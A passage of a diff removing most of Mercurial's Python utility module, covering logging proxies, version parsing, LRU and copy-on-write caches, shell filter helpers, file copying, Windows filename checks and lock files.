(self.name, len(dest), - res)) - - data = dest[0:res] if res is not None else b'' - self._writedata(data) - - def write(self, res, data): - if not self.writes: - return - - # Python 2 returns None from some write() calls. Python 3 (reasonably) - # returns the integer bytes written. - if res is None and data: - res = len(data) - - if self.logdataapis: - self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res)) - - self._writedata(data) - - def flush(self, res): - if not self.writes: - return - - self.fh.write('%s> flush() -> %r\n' % (self.name, res)) - - # For observedbufferedinputpipe. - def bufferedread(self, res, size): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> bufferedread(%d) -> %d' % ( - self.name, size, len(res))) - - self._writedata(res) - - def bufferedreadline(self, res): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> bufferedreadline() -> %d' % ( - self.name, len(res))) - - self._writedata(res) - -def makeloggingfileobject(logh, fh, name, reads=True, writes=True, - logdata=False, logdataapis=True): - """Turn a file object into a logging file object.""" - - observer = fileobjectobserver(logh, name, reads=reads, writes=writes, - logdata=logdata, logdataapis=logdataapis) - return fileobjectproxy(fh, observer) - -class socketobserver(baseproxyobserver): - """Logs socket activity.""" - def __init__(self, fh, name, reads=True, writes=True, states=True, - logdata=False, logdataapis=True): - self.fh = fh - self.name = name - self.reads = reads - self.writes = writes - self.states = states - self.logdata = logdata - self.logdataapis = logdataapis - - def makefile(self, res, mode=None, bufsize=None): - if not self.states: - return - - self.fh.write('%s> makefile(%r, %r)\n' % ( - self.name, mode, bufsize)) - - def recv(self, res, size, flags=0): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> recv(%d, %d) -> %d' % ( - self.name, size, flags, len(res))) - self._writedata(res) - - def recvfrom(self, res, size, flags=0): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> recvfrom(%d, %d) -> %d' % ( - self.name, size, flags, len(res[0]))) - - self._writedata(res[0]) - - def recvfrom_into(self, res, buf, size, flags=0): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % ( - self.name, size, flags, res[0])) - - self._writedata(buf[0:res[0]]) - - def recv_into(self, res, buf, size=0, flags=0): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> recv_into(%d, %d) -> %d' % ( - self.name, size, flags, res)) - - self._writedata(buf[0:res]) - - def send(self, res, data, flags=0): - if not self.writes: - return - - self.fh.write('%s> send(%d, %d) -> %d' % ( - self.name, len(data), flags, len(res))) - self._writedata(data) - - def sendall(self, res, data, flags=0): - if not self.writes: - return - - if self.logdataapis: - # Returns None on success. So don't bother reporting return value. - self.fh.write('%s> sendall(%d, %d)' % ( - self.name, len(data), flags)) - - self._writedata(data) - - def sendto(self, res, data, flagsoraddress, address=None): - if not self.writes: - return - - if address: - flags = flagsoraddress - else: - flags = 0 - - if self.logdataapis: - self.fh.write('%s> sendto(%d, %d, %r) -> %d' % ( - self.name, len(data), flags, address, res)) - - self._writedata(data) - - def setblocking(self, res, flag): - if not self.states: - return - - self.fh.write('%s> setblocking(%r)\n' % (self.name, flag)) - - def settimeout(self, res, value): - if not self.states: - return - - self.fh.write('%s> settimeout(%r)\n' % (self.name, value)) - - def gettimeout(self, res): - if not self.states: - return - - self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res)) - - def setsockopt(self, level, optname, value): - if not self.states: - return - - self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % ( - self.name, level, optname, value)) - -def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True, - logdata=False, logdataapis=True): - """Turn a socket into a logging socket.""" - - observer = socketobserver(logh, name, reads=reads, writes=writes, - states=states, logdata=logdata, - logdataapis=logdataapis) - return socketproxy(fh, observer) - -def version(): - """Return version information if available.""" - try: - from . import __version__ - return __version__.version - except ImportError: - return 'unknown' - -def versiontuple(v=None, n=4): - """Parses a Mercurial version string into an N-tuple. - - The version string to be parsed is specified with the ``v`` argument. - If it isn't defined, the current Mercurial version string will be parsed. - - ``n`` can be 2, 3, or 4. Here is how some version strings map to - returned values: - - >>> v = b'3.6.1+190-df9b73d2d444' - >>> versiontuple(v, 2) - (3, 6) - >>> versiontuple(v, 3) - (3, 6, 1) - >>> versiontuple(v, 4) - (3, 6, 1, '190-df9b73d2d444') - - >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118') - (3, 6, 1, '190-df9b73d2d444+20151118') - - >>> v = b'3.6' - >>> versiontuple(v, 2) - (3, 6) - >>> versiontuple(v, 3) - (3, 6, None) - >>> versiontuple(v, 4) - (3, 6, None, None) - - >>> v = b'3.9-rc' - >>> versiontuple(v, 2) - (3, 9) - >>> versiontuple(v, 3) - (3, 9, None) - >>> versiontuple(v, 4) - (3, 9, None, 'rc') - - >>> v = b'3.9-rc+2-02a8fea4289b' - >>> versiontuple(v, 2) - (3, 9) - >>> versiontuple(v, 3) - (3, 9, None) - >>> versiontuple(v, 4) - (3, 9, None, 'rc+2-02a8fea4289b') - """ - if not v: - v = version() - parts = remod.split('[\+-]', v, 1) - if len(parts) == 1: - vparts, extra = parts[0], None - else: - vparts, extra = parts - - vints = [] - for i in vparts.split('.'): - try: - vints.append(int(i)) - except ValueError: - break - # (3, 6) -> (3, 6, None) - while len(vints) < 3: - vints.append(None) - - if n == 2: - return (vints[0], vints[1]) - if n == 3: - return (vints[0], vints[1], vints[2]) - if n == 4: - return (vints[0], vints[1], vints[2], extra) - -def cachefunc(func): - '''cache the result of function calls''' - # XXX doesn't handle keywords args - if func.__code__.co_argcount == 0: - cache = [] - def f(): - if len(cache) == 0: - cache.append(func()) - return cache[0] - return f - cache = {} - if func.__code__.co_argcount == 1: - # we gain a small amount of time because - # we don't need to pack/unpack the list - def f(arg): - if arg not in cache: - cache[arg] = func(arg) - return cache[arg] - else: - def f(*args): - if args not in cache: - cache[args] = func(*args) - return cache[args] - - return f - -class cow(object): - """helper class to make copy-on-write easier - - Call preparewrite before doing any writes. - """ - - def preparewrite(self): - """call this before writes, return self or a copied new object""" - if getattr(self, '_copied', 0): - self._copied -= 1 - return self.__class__(self) - return self - - def copy(self): - """always do a cheap copy""" - self._copied = getattr(self, '_copied', 0) + 1 - return self - -class sortdict(collections.OrderedDict): - '''a simple sorted dictionary - - >>> d1 = sortdict([(b'a', 0), (b'b', 1)]) - >>> d2 = d1.copy() - >>> d2 - sortdict([('a', 0), ('b', 1)]) - >>> d2.update([(b'a', 2)]) - >>> list(d2.keys()) # should still be in last-set order - ['b', 'a'] - ''' - - def __setitem__(self, key, value): - if key in self: - del self[key] - super(sortdict, self).__setitem__(key, value) - - if pycompat.ispypy: - # __setitem__() isn't called as of PyPy 5.8.0 - def update(self, src): - if isinstance(src, dict): - src = src.iteritems() - for k, v in src: - self[k] = v - -class cowdict(cow, dict): - """copy-on-write dict - - Be sure to call d = d.preparewrite() before writing to d. - - >>> a = cowdict() - >>> a is a.preparewrite() - True - >>> b = a.copy() - >>> b is a - True - >>> c = b.copy() - >>> c is a - True - >>> a = a.preparewrite() - >>> b is a - False - >>> a is a.preparewrite() - True - >>> c = c.preparewrite() - >>> b is c - False - >>> b is b.preparewrite() - True - """ - -class cowsortdict(cow, sortdict): - """copy-on-write sortdict - - Be sure to call d = d.preparewrite() before writing to d. - """ - -class transactional(object): - """Base class for making a transactional type into a context manager.""" - __metaclass__ = abc.ABCMeta - - @abc.abstractmethod - def close(self): - """Successfully closes the transaction.""" - - @abc.abstractmethod - def release(self): - """Marks the end of the transaction. - - If the transaction has not been closed, it will be aborted. - """ - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - try: - if exc_type is None: - self.close() - finally: - self.release() - -@contextlib.contextmanager -def acceptintervention(tr=None): - """A context manager that closes the transaction on InterventionRequired - - If no transaction was provided, this simply runs the body and returns - """ - if not tr: - yield - return - try: - yield - tr.close() - except error.InterventionRequired: - tr.close() - raise - finally: - tr.release() - -@contextlib.contextmanager -def nullcontextmanager(): - yield - -class _lrucachenode(object): - """A node in a doubly linked list. - - Holds a reference to nodes on either side as well as a key-value - pair for the dictionary entry. - """ - __slots__ = (u'next', u'prev', u'key', u'value') - - def __init__(self): - self.next = None - self.prev = None - - self.key = _notset - self.value = None - - def markempty(self): - """Mark the node as emptied.""" - self.key = _notset - -class lrucachedict(object): - """Dict that caches most recent accesses and sets. - - The dict consists of an actual backing dict - indexed by original - key - and a doubly linked circular list defining the order of entries in - the cache. - - The head node is the newest entry in the cache. If the cache is full, - we recycle head.prev and make it the new head. Cache accesses result in - the node being moved to before the existing head and being marked as the - new head node. - """ - def __init__(self, max): - self._cache = {} - - self._head = head = _lrucachenode() - head.prev = head - head.next = head - self._size = 1 - self._capacity = max - - def __len__(self): - return len(self._cache) - - def __contains__(self, k): - return k in self._cache - - def __iter__(self): - # We don't have to iterate in cache order, but why not. - n = self._head - for i in range(len(self._cache)): - yield n.key - n = n.next - - def __getitem__(self, k): - node = self._cache[k] - self._movetohead(node) - return node.value - - def __setitem__(self, k, v): - node = self._cache.get(k) - # Replace existing value and mark as newest. - if node is not None: - node.value = v - self._movetohead(node) - return - - if self._size < self._capacity: - node = self._addcapacity() - else: - # Grab the last/oldest item. - node = self._head.prev - - # At capacity. Kill the old entry. - if node.key is not _notset: - del self._cache[node.key] - - node.key = k - node.value = v - self._cache[k] = node - # And mark it as newest entry. No need to adjust order since it - # is already self._head.prev. - self._head = node - - def __delitem__(self, k): - node = self._cache.pop(k) - node.markempty() - - # Temporarily mark as newest item before re-adjusting head to make - # this node the oldest item. - self._movetohead(node) - self._head = node.next - - # Additional dict methods. - - def get(self, k, default=None): - try: - return self._cache[k].value - except KeyError: - return default - - def clear(self): - n = self._head - while n.key is not _notset: - n.markempty() - n = n.next - - self._cache.clear() - - def copy(self): - result = lrucachedict(self._capacity) - n = self._head.prev - # Iterate in oldest-to-newest order, so the copy has the right ordering - for i in range(len(self._cache)): - result[n.key] = n.value - n = n.prev - return result - - def _movetohead(self, node): - """Mark a node as the newest, making it the new head. - - When a node is accessed, it becomes the freshest entry in the LRU - list, which is denoted by self._head. - - Visually, let's make ``N`` the new head node (* denotes head): - - previous/oldest <-> head <-> next/next newest - - ----<->--- A* ---<->----- - | | - E <-> D <-> N <-> C <-> B - - To: - - ----<->--- N* ---<->----- - | | - E <-> D <-> C <-> B <-> A - - This requires the following moves: - - C.next = D (node.prev.next = node.next) - D.prev = C (node.next.prev = node.prev) - E.next = N (head.prev.next = node) - N.prev = E (node.prev = head.prev) - N.next = A (node.next = head) - A.prev = N (head.prev = node) - """ - head = self._head - # C.next = D - node.prev.next = node.next - # D.prev = C - node.next.prev = node.prev - # N.prev = E - node.prev = head.prev - # N.next = A - # It is tempting to do just "head" here, however if node is - # adjacent to head, this will do bad things. - node.next = head.prev.next - # E.next = N - node.next.prev = node - # A.prev = N - node.prev.next = node - - self._head = node - - def _addcapacity(self): - """Add a node to the circular linked list. - - The new node is inserted before the head node. - """ - head = self._head - node = _lrucachenode() - head.prev.next = node - node.prev = head.prev - node.next = head - head.prev = node - self._size += 1 - return node - -def lrucachefunc(func): - '''cache most recent results of function calls''' - cache = {} - order = collections.deque() - if func.__code__.co_argcount == 1: - def f(arg): - if arg not in cache: - if len(cache) > 20: - del cache[order.popleft()] - cache[arg] = func(arg) - else: - order.remove(arg) - order.append(arg) - return cache[arg] - else: - def f(*args): - if args not in cache: - if len(cache) > 20: - del cache[order.popleft()] - cache[args] = func(*args) - else: - order.remove(args) - order.append(args) - return cache[args] - - return f - -class propertycache(object): - def __init__(self, func): - self.func = func - self.name = func.__name__ - def __get__(self, obj, type=None): - result = self.func(obj) - self.cachevalue(obj, result) - return result - - def cachevalue(self, obj, value): - # __dict__ assignment required to bypass __setattr__ (eg: repoview) - obj.__dict__[self.name] = value - -def clearcachedproperty(obj, prop): - '''clear a cached property value, if one has been set''' - if prop in obj.__dict__: - del obj.__dict__[prop] - -def pipefilter(s, cmd): - '''filter string S through command CMD, returning its output''' - p = subprocess.Popen(cmd, shell=True, close_fds=closefds, - stdin=subprocess.PIPE, stdout=subprocess.PIPE) - pout, perr = p.communicate(s) - return pout - -def tempfilter(s, cmd): - '''filter string S through a pair of temporary files with CMD. - CMD is used as a template to create the real command to be run, - with the strings INFILE and OUTFILE replaced by the real names of - the temporary files generated.''' - inname, outname = None, None - try: - infd, inname = tempfile.mkstemp(prefix='hg-filter-in-') - fp = os.fdopen(infd, r'wb') - fp.write(s) - fp.close() - outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-') - os.close(outfd) - cmd = cmd.replace('INFILE', inname) - cmd = cmd.replace('OUTFILE', outname) - code = os.system(cmd) - if pycompat.sysplatform == 'OpenVMS' and code & 1: - code = 0 - if code: - raise Abort(_("command '%s' failed: %s") % - (cmd, explainexit(code))) - return readfile(outname) - finally: - try: - if inname: - os.unlink(inname) - except OSError: - pass - try: - if outname: - os.unlink(outname) - except OSError: - pass - -filtertable = { - 'tempfile:': tempfilter, - 'pipe:': pipefilter, - } - -def filter(s, cmd): - "filter a string through a command that transforms its input to its output" - for name, fn in filtertable.iteritems(): - if cmd.startswith(name): - return fn(s, cmd[len(name):].lstrip()) - return pipefilter(s, cmd) - def binary(s): """return true if a string is binary data""" return bool(s and '\0' in s) -def increasingchunks(source, min=1024, max=65536): - '''return no less than min bytes per chunk while data remains, - doubling min after each chunk until it reaches max''' - def log2(x): - if not x: - return 0 - i = 0 - while x: - x >>= 1 - i += 1 - return i - 1 - - buf = [] - blen = 0 - for chunk in source: - buf.append(chunk) - blen += len(chunk) - if blen >= min: - if min < max: - min = min << 1 - nmin = 1 << log2(blen) - if nmin > min: - min = nmin - if min > max: - min = max - yield ''.join(buf) - blen = 0 - buf = [] - if buf: - yield ''.join(buf) - -Abort = error.Abort - -def always(fn): - return True - -def never(fn): - return False - -def nogc(func): - """disable garbage collector - - Python's garbage collector triggers a GC each time a certain number of - container objects (the number being defined by gc.get_threshold()) are - allocated even when marked not to be tracked by the collector. Tracking has - no effect on when GCs are triggered, only on what objects the GC looks - into. As a workaround, disable GC while building complex (huge) - containers. - - This garbage collector issue have been fixed in 2.7. But it still affect - CPython's performance. - """ - def wrapper(*args, **kwargs): - gcenabled = gc.isenabled() - gc.disable() - try: - return func(*args, **kwargs) - finally: - if gcenabled: - gc.enable() - return wrapper - -if pycompat.ispypy: - # PyPy runs slower with gc disabled - nogc = lambda x: x - -def pathto(root, n1, n2): - '''return the relative path from one place to another. - root should use os.sep to separate directories - n1 should use os.sep to separate directories - n2 should use "/" to separate directories - returns an os.sep-separated path. - - If n1 is a relative path, it's assumed it's - relative to root. - n2 should always be relative to root. - ''' - if not n1: - return localpath(n2) - if os.path.isabs(n1): - if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]: - return os.path.join(root, localpath(n2)) - n2 = '/'.join((pconvert(root), n2)) - a, b = splitpath(n1), n2.split('/') - a.reverse() - b.reverse() - while a and b and a[-1] == b[-1]: - a.pop() - b.pop() - b.reverse() - return pycompat.ossep.join((['..'] * len(a)) + b) or '.' - -def mainfrozen(): - """return True if we are a frozen executable. - - The code supports py2exe (most common, Windows only) and tools/freeze - (portable, not much used). - """ - return (safehasattr(sys, "frozen") or # new py2exe - safehasattr(sys, "importers") or # old py2exe - imp.is_frozen(u"__main__")) # tools/freeze - -# the location of data files matching the source code -if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app': - # executable version (py2exe) doesn't support __file__ - datapath = os.path.dirname(pycompat.sysexecutable) -else: - datapath = os.path.dirname(pycompat.fsencode(__file__)) - -i18n.setdatapath(datapath) - -_hgexecutable = None - -def hgexecutable(): - """return location of the 'hg' executable. - - Defaults to $HG or 'hg' in the search path. - """ - if _hgexecutable is None: - hg = encoding.environ.get('HG') - mainmod = sys.modules[r'__main__'] - if hg: - _sethgexecutable(hg) - elif mainfrozen(): - if getattr(sys, 'frozen', None) == 'macosx_app': - # Env variable set by py2app - _sethgexecutable(encoding.environ['EXECUTABLEPATH']) - else: - _sethgexecutable(pycompat.sysexecutable) - elif (os.path.basename( - pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'): - _sethgexecutable(pycompat.fsencode(mainmod.__file__)) - else: - exe = findexe('hg') or os.path.basename(sys.argv[0]) - _sethgexecutable(exe) - return _hgexecutable - -def _sethgexecutable(path): - """set location of the 'hg' executable""" - global _hgexecutable - _hgexecutable = path - -def _testfileno(f, stdf): - fileno = getattr(f, 'fileno', None) - try: - return fileno and fileno() == stdf.fileno() - except io.UnsupportedOperation: - return False # fileno() raised UnsupportedOperation - -def isstdin(f): - return _testfileno(f, sys.__stdin__) - -def isstdout(f): - return _testfileno(f, sys.__stdout__) - -def shellenviron(environ=None): - """return environ with optional override, useful for shelling out""" - def py2shell(val): - 'convert python object into string that is useful to shell' - if val is None or val is False: - return '0' - if val is True: - return '1' - return pycompat.bytestr(val) - env = dict(encoding.environ) - if environ: - env.update((k, py2shell(v)) for k, v in environ.iteritems()) - env['HG'] = hgexecutable() - return env - -def system(cmd, environ=None, cwd=None, out=None): - '''enhanced shell command execution. - run with environment maybe modified, maybe in different dir. - - if out is specified, it is assumed to be a file-like object that has a - write() method. stdout and stderr will be redirected to out.''' - try: - stdout.flush() - except Exception: - pass - cmd = quotecommand(cmd) - env = shellenviron(environ) - if out is None or isstdout(out): - rc = subprocess.call(cmd, shell=True, close_fds=closefds, - env=env, cwd=cwd) - else: - proc = subprocess.Popen(cmd, shell=True, close_fds=closefds, - env=env, cwd=cwd, stdout=subprocess.PIPE, - stderr=subprocess.STDOUT) - for line in iter(proc.stdout.readline, ''): - out.write(line) - proc.wait() - rc = proc.returncode - if pycompat.sysplatform == 'OpenVMS' and rc & 1: - rc = 0 - return rc - -def checksignature(func): - '''wrap a function with code to check for calling errors''' - def check(*args, **kwargs): - try: - return func(*args, **kwargs) - except TypeError: - if len(traceback.extract_tb(sys.exc_info()[2])) == 1: - raise error.SignatureError - raise - - return check - -# a whilelist of known filesystems where hardlink works reliably -_hardlinkfswhitelist = { - 'btrfs', - 'ext2', - 'ext3', - 'ext4', - 'hfs', - 'jfs', - 'NTFS', - 'reiserfs', - 'tmpfs', - 'ufs', - 'xfs', - 'zfs', -} - -def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False): - '''copy a file, preserving mode and optionally other stat info like - atime/mtime - - checkambig argument is used with filestat, and is useful only if - destination file is guarded by any lock (e.g. repo.lock or - repo.wlock). - - copystat and checkambig should be exclusive. - ''' - assert not (copystat and checkambig) - oldstat = None - if os.path.lexists(dest): - if checkambig: - oldstat = checkambig and filestat.frompath(dest) - unlink(dest) - if hardlink: - # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks - # unless we are confident that dest is on a whitelisted filesystem. - try: - fstype = getfstype(os.path.dirname(dest)) - except OSError: - fstype = None - if fstype not in _hardlinkfswhitelist: - hardlink = False - if hardlink: - try: - oslink(src, dest) - return - except (IOError, OSError): - pass # fall back to normal copy - if os.path.islink(src): - os.symlink(os.readlink(src), dest) - # copytime is ignored for symlinks, but in general copytime isn't needed - # for them anyway - else: - try: - shutil.copyfile(src, dest) - if copystat: - # copystat also copies mode - shutil.copystat(src, dest) - else: - shutil.copymode(src, dest) - if oldstat and oldstat.stat: - newstat = filestat.frompath(dest) - if newstat.isambig(oldstat): - # stat of copied file is ambiguous to original one - advanced = ( - oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff - os.utime(dest, (advanced, advanced)) - except shutil.Error as inst: - raise Abort(str(inst)) - -def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None): - """Copy a directory tree using hardlinks if possible.""" - num = 0 - - gettopic = lambda: hardlink and _('linking') or _('copying') - - if os.path.isdir(src): - if hardlink is None: - hardlink = (os.stat(src).st_dev == - os.stat(os.path.dirname(dst)).st_dev) - topic = gettopic() - os.mkdir(dst) - for name, kind in listdir(src): - srcname = os.path.join(src, name) - dstname = os.path.join(dst, name) - def nprog(t, pos): - if pos is not None: - return progress(t, pos + num) - hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog) - num += n - else: - if hardlink is None: - hardlink = (os.stat(os.path.dirname(src)).st_dev == - os.stat(os.path.dirname(dst)).st_dev) - topic = gettopic() - - if hardlink: - try: - oslink(src, dst) - except (IOError, OSError): - hardlink = False - shutil.copy(src, dst) - else: - shutil.copy(src, dst) - num += 1 - progress(topic, num) - progress(topic, None) - - return hardlink, num - -_winreservednames = { - 'con', 'prn', 'aux', 'nul', - 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9', - 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9', -} -_winreservedchars = ':*?"<>|' -def checkwinfilename(path): - r'''Check that the base-relative path is a valid filename on Windows. - Returns None if the path is ok, or a UI string describing the problem. - - >>> checkwinfilename(b"just/a/normal/path") - >>> checkwinfilename(b"foo/bar/con.xml") - "filename contains 'con', which is reserved on Windows" - >>> checkwinfilename(b"foo/con.xml/bar") - "filename contains 'con', which is reserved on Windows" - >>> checkwinfilename(b"foo/bar/xml.con") - >>> checkwinfilename(b"foo/bar/AUX/bla.txt") - "filename contains 'AUX', which is reserved on Windows" - >>> checkwinfilename(b"foo/bar/bla:.txt") - "filename contains ':', which is reserved on Windows" - >>> checkwinfilename(b"foo/bar/b\07la.txt") - "filename contains '\\x07', which is invalid on Windows" - >>> checkwinfilename(b"foo/bar/bla ") - "filename ends with ' ', which is not allowed on Windows" - >>> checkwinfilename(b"../bar") - >>> checkwinfilename(b"foo\\") - "filename ends with '\\', which is invalid on Windows" - >>> checkwinfilename(b"foo\\/bar") - "directory name ends with '\\', which is invalid on Windows" - ''' - if path.endswith('\\'): - return _("filename ends with '\\', which is invalid on Windows") - if '\\/' in path: - return _("directory name ends with '\\', which is invalid on Windows") - for n in path.replace('\\', '/').split('/'): - if not n: - continue - for c in _filenamebytestr(n): - if c in _winreservedchars: - return _("filename contains '%s', which is reserved " - "on Windows") % c - if ord(c) <= 31: - return _("filename contains '%s', which is invalid " - "on Windows") % escapestr(c) - base = n.split('.')[0] - if base and base.lower() in _winreservednames: - return _("filename contains '%s', which is reserved " - "on Windows") % base - t = n[-1:] - if t in '. ' and n not in '..': - return _("filename ends with '%s', which is not allowed " - "on Windows") % t - -if pycompat.iswindows: - checkosfilename = checkwinfilename - timer = time.clock -else: - checkosfilename = platform.checkosfilename - timer = time.time - -if safehasattr(time, "perf_counter"): - timer = time.perf_counter - -def makelock(info, pathname): - """Create a lock file atomically if possible - - This may leave a stale lock file if symlink isn't supported and signal - interrupt is enabled. - """ - try: - return os.symlink(info, pathname) - except OSError as why: - if why.errno == errno.EEXIST: - raise - except AttributeError: # no symlink in os - pass - - flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0) - ld = os.open(pathname, flags) - os.write(ld, info) - os.close(ld) - -def readlock(pathname): - try: - return os.readlink(pathname) - except OSError as why: - if why.errno not in (errno.EINVAL, errno.ENOSYS): - raise - except AttributeError: # no symlink in os - pass - fp = posixfile(pathname, 'rb') - r = fp.read() - fp.close() - return r - -def fstat(fp): - '''stat file object that may not have fileno method.''' - try: - return os.fstat(fp.fileno()) - except AttributeError: - return os.stat(fp.name) - -# File system features - -def fscasesensitive(path): - """ - Return true if the given path is on a case-sensitive filesystem - - Requires a path (like /foo/.hg) ending with a foldable final - directory component. - """ - s1 = os.lstat(path) - d, b = os.path.split(path) - b2 = b.upper() - if b == b2: - b2 = b.lower() - if b == b2: - return True # no evidence against case sensitivity - p2 = os.path.join(d, b2) - try: - s2 = os.lstat(p2) - if s2 == s1: - return False - return True - except OSError: - return True - -try: - import re2 - _re2 = None -except ImportError: - _re2 = False - -class _re(object): - def _checkre2(self): - global _re2 - try: - # check if match works, see issue3964 - _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]')) - except ImportError: - _re2 = False - - def compile(self, pat, flags=0): - '''Compile a regular expression, using re2 if possible - - For best performance, use only re2-compatible regexp features. The - only flags from the re module that are re2-compatible are - IGNORECASE and MULTILINE.''' - if _re2 is None: - self._checkre2() - if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0: - if flags & remod.IGNORECASE: - pat = '(?i)' + pat - if flags & remod.MULTILINE: - pat = '(?m)' + pat - try: - return re2.compile(pat) - except re2.error: - pass - return remod.compile(pat, flags) - - @propertycache - def escape(self): - '''Return the version of escape corresponding to self.compile. - - This is imperfect because whether re2 or re is used for a particular - function depends on the flags, etc, but it's the best we can do. - ''' - global _re2 - if _re2 is None: - self._checkre2() - if _re2: - return re2.escape - else: - return remod.escape - -re = _re() - -_fspathcache = {} -def fspath(name, root): - '''Get name in the case stored in the filesystem - - The name should be relative to root, and be normcase-ed for efficiency. - - Note that this function is unnecessary, and should not be - called, for case-sensitive filesystems (simply because it's expensive). - - The root should be normcase-ed, too. - ''' - def _makefspathcacheentry(dir): - return dict((normcase(n), n) for n in os.listdir(dir)) - - seps = pycompat.ossep - if pycompat.osaltsep: - seps = seps + pycompat.osaltsep - # Protect backslashes. This gets silly very quickly. - seps.replace('\\','\\\\') - pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps)) - dir = os.path.normpath(root) - result = [] - for part, sep in pattern.findall(name): - if sep: - result.append(sep) - continue - - if dir not in _fspathcache: - _fspathcache[dir] = _makefspathcacheentry(dir) - contents = _fspathcache[dir] - - found = contents.get(part) - if not found: - # retry "once per directory" per "dirstate.walk" which - # may take place for each patches of "hg qpush", for example - _fspathcache[dir] = contents = _makefspathcacheentry(dir) - found = contents.get(part) - - result.append(found or part) - dir = os.path.join(dir, part) - - return ''.join(result) - -def checknlink(testfile): - '''check whether hardlink count reporting works properly''' - - # testfile may be open, so we need a separate file for checking to - # work around issue2543 (or testfile may get lost on Samba shares) - f1, f2, fp = None, None, None - try: - fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile), - suffix='1~', dir=os.path.dirname(testfile)) - os.close(fd) - f2 = '%s2~' % f1[:-2] - - oslink(f1, f2) - # nlinks() may behave differently for files on Windows shares if - # the file is open. - fp = posixfile(f2) - return nlinks(f2) > 1 - except OSError: - return False - finally: - if fp is not None: - fp.close() - for f in (f1, f2): - try: - if f is not None: - os.unlink(f) - except OSError: - pass - -def endswithsep(path): - '''Check path ends with os.sep or os.altsep.''' - return (path.endswith(pycompat.ossep) - or pycompat.osaltsep and path.endswith(pycompat.osaltsep)) - -def splitpath(path): - '''Split path by os.sep. - Note that this function does not use os.altsep because this is - an alternative of simple "xxx.split(os.sep)". - It is recommended to use os.path.normpath() before using this - function if need.''' - return path.split(pycompat.ossep) - -def gui(): - '''Are we running in a GUI?''' - if pycompat.isdarwin: - if 'SSH_CONNECTION' in encoding.environ: - # handle SSH access to a box where the user is logged in - return False - elif getattr(osutil, 'isgui', None): - # check if a CoreGraphics session is available - return osutil.isgui() - else: - # pure build; use a safe default - return True - else: - return pycompat.iswindows or encoding.environ.get("DISPLAY") - -def mktempcopy(name, emptyok=False, createmode=None): - """Create a temporary file with the same contents from name - - The permission bits are copied from the original file. - - If the temporary file is going to be truncated immediately, you - can use emptyok=True as an optimization. - - Returns the name of the temporary file. - """ - d, fn = os.path.split(name) - fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d) - os.close(fd) - # Temporary files are created with mode 0600, which is usually not - # what we want. If the original file already exists, just copy - # its mode. Otherwise, manually obey umask. - copymode(name, temp, createmode) - if emptyok: - return temp - try: - try: - ifp = posixfile(name, "rb") - except IOError as inst: - if inst.errno == errno.ENOENT: - return temp - if not getattr(inst, 'filename', None): - inst.filename = name - raise - ofp = posixfile(temp, "wb") - for chunk in filechunkiter(ifp): - ofp.write(chunk) - ifp.close() - ofp.close() - except: # re-raises - try: - os.unlink(temp) - except OSError: - pass - raise - return temp - -class filestat(object): - """help to exactly detect change of a file - - 'stat' attribute is result of 'os.stat()' if specified 'path' - exists. Otherwise, it is None. This can avoid preparative - 'exists()' examination on client side of this class. - """ - def __init__(self, stat): - self.stat = stat - - @classmethod - def frompath(cls, path): - try: - stat = os.stat(path) - except OSError as err: - if err.errno != errno.ENOENT: - raise - stat = None - return cls(stat) - - @classmethod - def fromfp(cls, fp): - stat = os.fstat(fp.fileno()) - return cls(stat) - - __hash__ = object.__hash__ - - def __eq__(self, old): - try: - # if ambiguity between stat of new and old file is - # avoided, comparison of size, ctime and mtime is enough - # to exactly detect change of a file regardless of platform - return (self.stat.st_size == old.stat.st_size and - self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and - self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]) - except AttributeError: - pass - try: - return self.stat is None and old.stat is None - except AttributeError: - return False - - def isambig(self, old): - """Examine whether new (= self) stat is ambiguous against old one - - "S[N]" below means stat of a file at N-th change: - - - S[n-1].ctime < S[n].ctime: can detect change of a file - - S[n-1].ctime == S[n].ctime - - S[n-1].ctime < S[n].mtime: means natural advancing (*1) - - S[n-1].ctime == S[n].mtime: is ambiguous (*2) - - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care) - - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care) - - Case (*2) above means that a file was changed twice or more at - same time in sec (= S[n-1].ctime), and comparison of timestamp - is ambiguous. - - Base idea to avoid such ambiguity is "advance mtime 1 sec, if - timestamp is ambiguous". - - But advancing mtime only in case (*2) doesn't work as - expected, because naturally advanced S[n].mtime in case (*1) - might be equal to manually advanced S[n-1 or earlier].mtime. - - Therefore, all "S[n-1].ctime == S[n].ctime" cases should be - treated as ambiguous regardless of mtime, to avoid overlooking - by confliction between such mtime. - - Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime != - S[n].mtime", even if size of a file isn't 